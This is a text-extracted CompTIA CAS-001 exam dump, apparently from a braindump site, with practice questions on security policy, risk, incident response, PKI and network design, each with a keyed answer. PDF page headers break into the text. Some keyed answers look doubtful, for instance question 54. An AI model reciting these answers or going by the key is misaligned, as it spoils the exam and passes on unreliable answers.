A. Database servers should be on the same virtual server as web servers in the DMZ network segment.B. Web servers should be on the same physical server as database servers in the network segment.C. Virtual servers should only be on the same physical server as others in their network segment.

Real 28CompTIA CAS-001 Exam

D. Physical servers should only be on the same WAN as other physical servers in their network.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 46Which of the following should be used with caution because of its ability to provide access to block level data instead of file level data?

A. CIFSB. NFSC. iSCSID. NAS

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 47Which of the following can aid a buffer overflow attack to execute when used in the creation of applications?

A. Secure cookie storageB. Standard librariesC. State managementD. Input validation

Page 27: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 48The Chief Executive Officer (CEO) of a corporation purchased the latest mobile device and wants to connect it to the company's internal network. The ChiefInformation Security Officer (CISO) was told to research and recommend how to secure this device.

Which of the following recommendations should be implemented to keep the device from posing a

Real 29CompTIA CAS-001 Examsecurity risk to the company?

A. A corporate policy to prevent sensitive information from residing on a mobile device and anti- virus software.B. Encryption of the non-volatile memory and a corporate policy to prevent sensitive information from residing on a mobile device.C. Encryption of the non-volatile memory and a password or PIN to access the device.D. A password or PIN to access the device and a corporate policy to prevent sensitive information from residing on a mobile device.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 49The Chief Executive Officer (CEO) of a corporation decided to move all email to a cloud computing environment. The Chief Information Security Officer (CISO) wastold to research the risk involved in this environment.

Which of the following measures should be implemented to minimize the risk of hosting email in the cloud?

A. Remind users that all emails with sensitive information need be encrypted and physically inspect the cloud computing.B. Ensure logins are over an encrypted channel and obtain an NDA and an SLA from the cloud provider.C. Ensure logins are over an encrypted channel and remind users to encrypt all emails that contain sensitive information.D. Obtain an NDA from the cloud provider and remind users that all emails with sensitive information need be encrypted.

Page 28: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 50The Chief Executive Officer (CEO) of a corporation purchased the latest mobile device and wants to connect it to the internal network. The Chief InformationSecurity Officer (CISO) was told to research and recommend how to secure this device.

http://www.gratisexam.com/

Real 30CompTIA CAS-001 ExamWhich of the following should be implemented, keeping in mind that the CEO has stated that this access is required?

A. Mitigate and TransferB. Accept and TransferC. Transfer and AvoidD. Avoid and Mitigate

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 51The Chief Executive Officer (CEO) of a corporation purchased the latest mobile device and connected it to the internal network. The CEO proceeded to downloadsensitive financial documents through their email. The device was then lost in transit to a conference. The CEO notified the company helpdesk about the lost deviceand another one was shipped out, after which the helpdesk ticket was closed stating the issue was resolved.

This data breach was not properly reported due to insufficient training surrounding which of the following processes?

Page 29: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. E-DiscoveryB. Data handlingC. Incident responseD. Data recovery and storage

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 52An employee was terminated and promptly escorted to their exit interview, after which the employee left the building. It was later discovered that this employee hadstarted a consulting business using screen shots of their work at the company which included live customer data. This information had been removed through theuse of a USB device. After this incident, it was determined a process review must be conducted to ensure this issue does not recur.

Which of the following business areas should primarily be involved in this discussion? (Select TWO).

Real 31CompTIA CAS-001 Exam

A. Database AdministratorB. Human ResourcesC. FinanceD. Network AdministratorE. IT Management

Correct Answer: BESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 53A technician states that workstations that are on the network in location B are unable to validate certificates, while workstations that are on the main location A'snetwork are having no issues. Which of the following methods allows a certificate to be validated by a single server that returns the validity of that certificate?

Page 30: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. XACMLB. OCSPC. ACLD. CRL

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 54A system administrator needs to develop a policy for when an application server is no longer needed. Which of the following policies would need to be developed?

A. Backup policyB. De-provisioning policyC. Data retention policyD. Provisioning policy

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 55Real 32CompTIA CAS-001 ExamA web administrator develops a web form for users to respond to the company via a web page.

Which of the following should be practiced to avoid a security risk?

A. SQL injectionB. XSS scriptingC. Click jackingD. Input validation

Page 31: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 56A user reports that the workstation's mouse pointer is moving and files are opening automatically.

Which of the following should the user perform?

A. Unplug the network cable to avoid network activity.B. Reboot the workstation to see if problem occurs again.C. Turn off the computer to avoid any more issues.D. Contact the incident response team for direction.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 57A system designer needs to factor in CIA requirements for a new SAN. Which of the CIA requirements is BEST met by multipathing?

A. ConfidentialityB. AuthenticationC. IntegrityD. Availability

Correct Answer: DSection: (none)Explanation

Explanation/Reference:answer is valid and updated.

Page 32: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 58An internal employee has sold a copy of the production customer database that was being used for upgrade testing to outside parties via HTTP file upload. TheChief Information Officer (CIO) has resigned and the Chief Executive Officer (CEO) has tasked the incoming CIO with putting effective controls in place to helpprevent this from occurring again in the future. Which of the following controls is the MOST effective in preventing this threat from re-occurring?

A. Network-based intrusion prevention systemB. Data loss preventionC. Host-based intrusion detection systemD. Web application firewall

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 59A security manager has provided a Statement of Work (SOW) to an external penetration testing firm for a web application security test. The web application startswith a very simple HTML survey form with two components: a country selection dropdown list and a submit button. The penetration testers are required to providetheir test cases for this survey form in advance. In order to adequately test the input validation of the survey form, which of the following tools would be the BESTtool for the technician to use?

A. HTTP interceptorB. Vulnerability scannerC. Port scannerD. Fuzzer

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 60An online banking application has had its source code updated and is soon to be re-launched. The underlying infrastructure has not been changed. In order toensure that the application has an appropriate security posture, several security-related activities are required.

Page 33: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Real 34CompTIA CAS-001 ExamWhich of the following security activities should be performed to provide an appropriate level of security testing coverage? (Select TWO).

A. Penetration test across the application with accounts of varying access levels (i.e. non- authenticated, authenticated, and administrative users).B. Code review across critical modules to ensure that security defects, Trojans, and backdoors are not present.C. Vulnerability assessment across all of the online banking servers to ascertain host and container configuration lock-down and patch levels.D. Fingerprinting across all of the online banking servers to ascertain open ports and services.E. Black box code review across the entire code base to ensure that there are no security defects present.

Correct Answer: ABSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 61Within a large organization, the corporate security policy states that personal electronic devices are not allowed to be placed on the company network. There isconsiderable pressure from the company board to allow smartphones to connect and synchronize email and calendar items of board members and companyexecutives. Which of the following options BEST balances the security and usability requirements of the executive management team?

A. Allow only the executive management team the ability to use personal devices on the company network, as they have important responsibilities and needconvenient access.

B. Review the security policy. Perform a risk evaluation of allowing devices that can be centrally managed, remotely disabled, and have device-level encryption ofsensitive data.

C. Stand firm on disallowing non-company assets from connecting to the network as the assets may lead to undesirable security consequences, such as sensitiveemails being leaked outside the company.

D. Allow only certain devices that are known to have the ability of being centrally managed. Do not allow any other smartphones until the device is proven to becentrally managed.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 62

Page 34: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A replacement CRM has had its business case approved. In preparation for a requirements workshop, an architect is working with a business analyst to ensure thatappropriate security

Real 35CompTIA CAS-001 Examrequirements have been captured. Which of the following documents BEST captures the security requirements?

A. Business requirements documentB. Requirements traceability matrix documentC. Use case and viewpoints documentD. Solution overview document

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 63Which of the following BEST defines the term e-discovery?

A. A product that provides IT-specific governance, risk management, and compliance.B. A form of reconnaissance used by penetration testers to discover listening hosts.C. A synonymous term for computer emergency response and incident handling.D. A process of producing electronically stored information for use as evidence.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 64A new project initiative involves replacing a legacy core HR system, and is expected to touch many major operational systems in the company. A securityadministrator is engaged in the project to provide security consulting advice. In addition, there are database, network, application, HR, and transformationmanagement consultants engaged on the project as well. The administrator has established the security requirements. Which of the following is the NEXT logicalstep?

Page 35: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Document the security requirements in an email and move on to the next most urgent task.B. Organize for a requirements workshop with the non-technical project members, being the HR and transformation management consultants.C. Communicate the security requirements with all stakeholders for discussion and buy-in.D. Organize for a requirements workshop with the technical project members, being the database, network, and application consultants.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:

QUESTION 65SDLC is being used for the commissioning of a new platform. To provide an appropriate level of assurance the security requirements that were specified at theproject origin need to be carried through to implementation. Which of the following would BEST help to determine if this occurred?

A. Requirements workshopB. Security development lifecycle (SDL)C. Security requirements traceability matrix (SRTM)D. Secure code review and penetration test

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 66An IT administrator has installed new DNS name servers (Primary and Secondary), which are used to host the company MX records and resolve the web server'spublic address. In order to secure the zone transfer between the primary and secondary server, the administrator uses only server ACLs. Which of the followingattacks could the secondary DNS server still be susceptible to?

A. Email spammingB. IP spoofingC. ClickjackingD. DNS replication

Correct Answer: B

Page 36: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Section: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 67The Chief Executive Officer (CEO) has decided to outsource systems which are not core business functions; however, a recent review by the risk officer hasindicated that core business functions are dependent on the outsourced systems. The risk officer has requested that the IT department calculates the priority ofrestoration for all systems and applications under the new business

Real 37CompTIA CAS-001 Exammodel. Which of the following is the BEST tool to achieve this?

A. Business impact analysisB. Annualized loss expectancy analysisC. TCO analysisD. Residual risk and gap analysis

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 68A data breach occurred which impacted the HR and payroll system. It is believed that an attack from within the organization resulted in the data breach. Which ofthe following should be performed FIRST after the data breach occurred?

A. Assess system statusB. Restore from backup tapesC. Conduct a business impact analysisD. Review NIDS logs

Correct Answer: ASection: (none)Explanation

Page 37: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

QUESTION 69A production server has been compromised. Which of the following is the BEST way to preserve the non-volatile evidence?

A. Shut the server down and image the hard drive.B. Remove all power sources from the server.C. Install remote backup software and copy data to write-once media.D. Login remotely and perform a full backup of the server.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 70Real 38CompTIA CAS-001 ExamA project has been established in a large bank to develop a new secure online banking platform. Half way through the development it was discovered that a keypiece of software used as part of the base platform is now susceptible to recently published exploits. Who should be contacted FIRST by the project team todiscuss potential changes to the platform requirements?

A. EngineersB. Facilities ManagerC. StakeholdersD. Human Resources

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 71The IT department of a large telecommunications company has developed and finalized a set of security solutions and policies which have been approved by uppermanagement for deployment within the company. During the development of the security solutions and policies, the FIRST thing the IT department should have

Page 38: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

done was:

A. contact vendor management so the RFI and RFP process can be started as soon as possible.B. contact an independent consultant who can tell them what policies and solutions they need.C. discuss requirements with stakeholders from the various internal departments.D. involve facilities management early in the project so they can plan for the new security hardware in the data center.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 72Employees have recently requested remote access to corporate email and shared drives. Remote access has never been offered; however, the need to improveproductivity and rapidly responding to customer demands means staff now requires remote access. Which of the following controls will BEST protect the corporatenetwork?

A. Develop a security policy that defines remote access requirements. Perform regular audits of user accounts and reviews of system logs.B. Secure remote access systems to ensure shared drives are read only and access is provided through a SSL portal. Perform regular audits of user accounts and

reviews of system logs.Real 39CompTIA CAS-001 Exam

C. Plan and develop security policies based on the assumption that external environments have active hostile threats.D. Implement a DLP program to log data accessed by users connecting via remote access.

Regularly perform user revalidation.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 73A manufacturing company is having issues with unauthorized access and modification of the controls operating the production equipment. A communicationrequirement is to allow the free flow of data between all network segments at the site. Which of the following BEST remediates the issue?

Page 39: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Implement SCADA security measures.B. Implement NIPS to prevent the unauthorized activity.C. Implement an AAA solution.D. Implement a firewall to restrict access to only a single management station.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 74A small bank is introducing online banking to its customers through its new secured website. The firewall has three interfaces: one for the Internet connection,another for the DMZ, and the other for the internal network. Which of the following will provide the MOST protection from all likely attacks on the bank?

A. Implement NIPS inline between the web server and the firewall.B. Implement a web application firewall inline between the web server and the firewall.C. Implement host intrusion prevention on all machines at the bank.D. Configure the firewall policy to only allow communication with the web server using SSL.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

Real 40CompTIA CAS-001 Exam

QUESTION 75The Chief Information Officer (CIO) comes to the security manager and asks what can be done to reduce the potential of sensitive data being emailed out of thecompany. Which of the following is an active security measure to protect against this threat?

A. Require a digital signature on all outgoing emails.B. Sanitize outgoing content.C. Implement a data classification policy.D. Implement a SPAM filter.

Page 40: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 76A company is developing a new web application for its Internet users and is following a secure coding methodology. Which of the following methods would BESTassist the developers in determining if any unknown vulnerabilities are present?

A. Conduct web server load tests.B. Conduct static code analysis.C. Conduct fuzzing attacks.D. Conduct SQL injection and XSS attacks.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 77An organization must comply with a new regulation that requires the organization to determine if an external attacker is able to gain access to its systems fromoutside the network. Which of the following should the company conduct to meet the regulation's criteria?

A. Conduct a compliance reviewB. Conduct a vulnerability assessmentC. Conduct a black box penetration testD. Conduct a full system audit

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Real 41

Page 41: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

CompTIA CAS-001 Exam

Explanation:

QUESTION 78The sales division within a large organization purchased touch screen tablet computers for all 250 sales representatives in an effort to showcase the use oftechnology to its customers and increase productivity. This includes the development of a new product tracking application that works with the new platform. Thesecurity manager attempted to stop the deployment because the equipment and application are non-standard and unsupported within the organization. However,upper management decided to continue the deployment. Which of the following provides the BEST method for evaluating the potential threats?

A. Conduct a vulnerability assessment to determine the security posture of the new devices and the application.B. Benchmark other organization's that already encountered this type of situation and apply all relevant learning's and industry best practices.C. Work with the business to understand and classify the risk associated with the full lifecycle of the hardware and software deployment.D. Develop a standard image for the new devices and migrate to a web application to eliminate locally resident data.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 79Based on the results of a recent audit, a company rolled out a standard computer image in an effort to provide consistent security configurations across allcomputers. Which of the following controls provides the GREATEST level of certainty that unauthorized changes are not occurring?

A. Schedule weekly vulnerability assessmentsB. Implement continuous log monitoringC. Scan computers weekly against the baselineD. Require monthly reports showing compliance with configuration and updates

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

Real 42CompTIA CAS-001 Exam

Page 42: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 80Due to a new regulation, a company has to increase active monitoring of security-related events to 24 hours a day. The security staff only has three full timeemployees that work during normal business hours. Instead of hiring new security analysts to cover the remaining shifts necessary to meet the monitoringrequirement, the Chief Information Officer (CIO) has hired a Managed Security Service (MSS) to monitor events. Which of the following should the company do toensure that the chosen MSS meets expectations?

A. Develop a memorandum of understanding on what the MSS is responsible to provide.B. Create internal metrics to track MSS performance.C. Establish a mutually agreed upon service level agreement.D. Issue a RFP to ensure the MSS follows guidelines.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 81The company's marketing department needs to provide more real-time interaction with its partners and consumers and decides to move forward with a presence onmultiple social networking sites for sharing information. Which of the following minimizes the potential exposure of proprietary information?

A. Require each person joining the company's social networking initiative to accept a non- disclosure agreement.B. Establish a specific set of trained people that can release information on the organization's behalf.C. Require a confidential statement be attached to all information released to the social networking sites.D. Establish a social media usage policy and provide training to all marketing employees.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 82Company Z is merging with Company A to expand its global presence and consumer base. This purchase includes several offices in different countries. Tomaintain strict internal security and compliance requirements, all employee activity may be monitored and reviewed. Which of the following would be the MOSTlikely cause for a change in this practice?

Page 43: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Real 43CompTIA CAS-001 Exam

A. The excessive time it will take to merge the company's information systems.B. Countries may have different legal or regulatory requirements.C. Company A might not have adequate staffing to conduct these reviews.D. The companies must consolidate security policies during the merger.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 83An administrator wants to virtualize the company's web servers, application servers, and database servers. Which of the following should be done to secure thevirtual host machines? (Select TWO).

A. Establish VLANs for each virtual guest's NIC on the virtual switch.B. Enable virtual switch layer 2 security precautions.C. Only access hosts through a secure management interface.D. Distribute guests to hosts by application role or trust zone.E. Restrict physical and network access to the host console.

Correct Answer: CESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 84A security incident happens three times a year on a company's web server costing the company $1,500 in downtime, per occurrence. The web server is only forarchival access and is scheduled to be decommissioned in five years. The cost of implementing software to prevent this incident would be $15,000 initially, plus$1,000 a year for maintenance. Which of the following is the MOST cost-effective manner to deal with this risk?

A. Avoid the riskB. Transfer the risk

Page 44: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

C. Accept the riskD. Mitigate the risk

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

Real 44CompTIA CAS-001 Exam

QUESTION 85An administrator is assessing the potential risk impact on an accounting system and categorizes it as follows:

Administrative Files = {(Confidentiality, Moderate), (Integrity, Moderate), (Availability, Low)}

Vendor Information = {(Confidentiality, Moderate), (Integrity, Low), (Availability, Low)}

Payroll Data = {(Confidentiality, High), (Integrity, Moderate), (Availability, Low)}

Which of the following is the aggregate risk impact on the accounting system?

A. {(Confidentiality, Moderate), (Integrity, Moderate), (Availability, Moderate)}B. {(Confidentiality, High), (Integrity, Low), (Availability, Low)}C. {(Confidentiality, High), (Integrity, Moderate), (Availability, Low)}D. {(Confidentiality, Moderate), (Integrity, Moderate), (Availability, Low)}

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 86An administrator is reviewing a recent security audit and determines that two users in finance also have access to the human resource data. One of those users fillsin for any HR employees on vacation, the other user only works in finance. Which of the following policies is being violated by the finance user according to the auditresults?

Page 45: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Mandatory vacationB. Non-disclosureC. Job rotationD. Least privilege

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 87After a security incident, an administrator revokes the SSL certificate for their web server www.company.com. Later, users begin to inform the help desk that a fewother servers are generating certificate errors: ftp.company.com, mail.company.com, and partners.company.com.

Real 45CompTIA CAS-001 ExamWhich of the following is MOST likely the reason for this?

A. Each of the servers used the same EV certificate.B. The servers used a wildcard certificate.C. The web server was the CA for the domain.D. Revoking a certificate can only be done at the domain level.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Topic 2, Volume B

QUESTION 88Virtual hosts with different security requirements should be:

A. encrypted with a one-time password.

Page 46: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

B. stored on separate physical hosts.C. moved to the cloud.D. scanned for vulnerabilities regularly.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 89Corporate policy states that the systems administrator should not be present during system audits.The security policy that states this is:

A. Separation of duties.B. Mandatory vacation.C. Non-disclosure agreement.D. Least privilege.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 90Real 46CompTIA CAS-001 ExamWhen Company A and Company B merged, the network security administrator for Company A was tasked with joining the two networks. Which of the followingshould be done FIRST?

A. Implement a unified IPv6 addressing scheme on the entire network.B. Conduct a penetration test of Company B's network.C. Perform a vulnerability assessment on Company B's network.D. Perform a peer code review on Company B's application.

Correct Answer: C

Page 47: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Section: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 91A legacy system is not scheduled to be decommissioned for two years and requires the use of the standard Telnet protocol. Which of the following should be usedto mitigate the security risks of this system?

A. Migrate the system to IPv6.B. Migrate the system to RSH.C. Move the system to a secure VLAN.D. Use LDAPs for authentication.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 92An ISP is peering with a new provider and wishes to disclose which autonomous system numbers should be allowed through BGP for network transport. Which ofthe following should contain this information?

A. Memorandum of UnderstandingB. Interconnection Security AgreementC. Operating Level AgreementD. Service Level Agreement

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Real 47CompTIA CAS-001 Exam

Page 48: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 93A wholesaler has decided to increase revenue streams by selling direct to the public through an on-line system. Initially this will be run as a short term trial and ifprofitable, will be expanded and form part of the day to day business. The risk manager has raised two main business risks for the initial trial:

1. IT staff has no experience with establishing and managing secure on-line credit card processing.

2. An internal credit card processing system will expose the business to additional compliance requirements.

Which of the following is the BEST risk mitigation strategy?

A. Transfer the risks to another internal department, who have more resources to accept the risk.B. Accept the risks and log acceptance in the risk register. Once the risks have been accepted close them out.C. Transfer the initial risks by outsourcing payment processing to a third party service provider.D. Mitigate the risks by hiring additional IT staff with the appropriate experience and certifications.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 94A large enterprise is expanding through the acquisition of a second corporation. Which of the following should be undertaken FIRST before connecting the networksof the newly formed entity?

A. A system and network scan to determine if all of the systems are secure.B. Implement a firewall/DMZ system between the networks.C. Develop a risk analysis for the merged networks.D. Conduct a complete review of the security posture of the acquired corporation.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 95

Page 49: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

The company is considering issuing non-standard tablet computers to executive management. Which of the following is the FIRST step the security managershould perform?

Real 48CompTIA CAS-001 Exam

A. Apply standard security policy settings to the devices.B. Set up an access control system to isolate the devices from the network.C. Integrate the tablets into standard remote access systems.D. Develop the use case for the devices and perform a risk analysis.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 96When authenticating over HTTP using SAML, which of the following is issued to the authenticating user?

A. A symmetric keyB. A PKI ticketC. An X.509 certificateD. An assertion ticket

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 97Which of the following activities could reduce the security benefits of mandatory vacations?

A. Have a replacement employee run the same applications as the vacationing employee.B. Have a replacement employee perform tasks in a different order from the vacationing employee.C. Have a replacement employee perform the job from a different workstation than the vacationing employee.

Page 50: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. Have a replacement employee run several daily scripts developed by the vacationing employee.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 98A database is hosting information assets with a computed CIA aggregate value of high. The

Real 49CompTIA CAS-001 Examdatabase is located within a secured network zone where there is flow control between the client and datacenter networks. Which of the following is the MOST likelythreat?

A. Inappropriate administrator accessB. Malicious codeC. Internal business fraudD. Regulatory compliance

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 99An organization recently upgraded its wireless infrastructure to support WPA2 and requires all clients to use this method. After the upgrade, several critical wirelessclients fail to connect because they are only WEP compliant. For the foreseeable future, none of the affected clients have an upgrade path to put them intocompliance with the WPA2 requirement. Which of the following provides the MOST secure method of integrating the non-compliant clients into the network?

A. Create a separate SSID and WEP key to support the legacy clients and enable detection of rogue APs.B. Create a separate SSID and WEP key on a new network segment and only allow required communication paths.C. Create a separate SSID and require the legacy clients to connect to the wireless network using certificate-based 802.1x.D. Create a separate SSID and require the use of dynamic WEP keys.

Page 51: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 100The Chief Information Security Officer (CISO) is researching ways to reduce the risk associated with administrative access of six IT staff members while enforcingseparation of duties. In the case where an IT staff member is absent, each staff member should be able to perform all the necessary duties of their IT co-workers.Which of the following policies should the CISO implement to reduce the risk?

A. Require the use of an unprivileged account, and a second shared account only for Real 50CompTIA CAS-001 Examadministrative purposes.

B. Require role-based security on primary role, and only provide access to secondary roles on a case-by-case basis.C. Require separation of duties ensuring no single administrator has access to all systems.D. Require on-going auditing of administrative activities, and evaluate against risk-based metrics.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 101A company has a primary DNS server at address 192.168.10.53 and a secondary server at 192.168.20.53. An administrator wants to secure a company by onlyallowing secure zone transfers to the secondary server. Which of the following should appear in the primary DNS configuration file to accomplish this?

A. key company-key.{algorithm hmac-rc4;secret "Hdue8du9jdknkhdoLksdlkeYEIks83K=";};allow transfer { 192.168.20.53; }

B. key company-key.{algorithm hmac-md5;secret "Hdue8du9jdknkhdoLksdlkeYEIks83K=";};allow transfer { 192.168.10.53; }

Page 52: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

C. key company-key.{algorithm hmac-md5;secret "Hdue8du9jdknkhdoLksdlkeYEIks83K=";};allow transfer { 192.168.20.53; }

D. key company-key.{algorithm hmac-rc4;secret "Hdue8du9jdknkhdoLksdlkeYEIks83K=";};allow transfer { 192.168.10.53; }

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 102Real 51CompTIA CAS-001 ExamAn employee of a company files a complaint with a security administrator. While sniffing network traffic, the employee discovers that financially confidential emailswere passing between two warehouse users. The two users deny sending confidential emails to each other. Which of the following security practices would allow fornon-repudiation and prevent network sniffers from reading the confidential mail? (Select TWO).

A. Transport encryptionB. Authentication hashingC. Digital signatureD. Legal mail holdE. TSIG code signing

Correct Answer: ACSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 103An administrator of a secure web server has several clients with top security clearance and prefers security over performance. By default, which of the following

Page 53: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

cipher suites would provide strong security, but at the same time the worst performance?

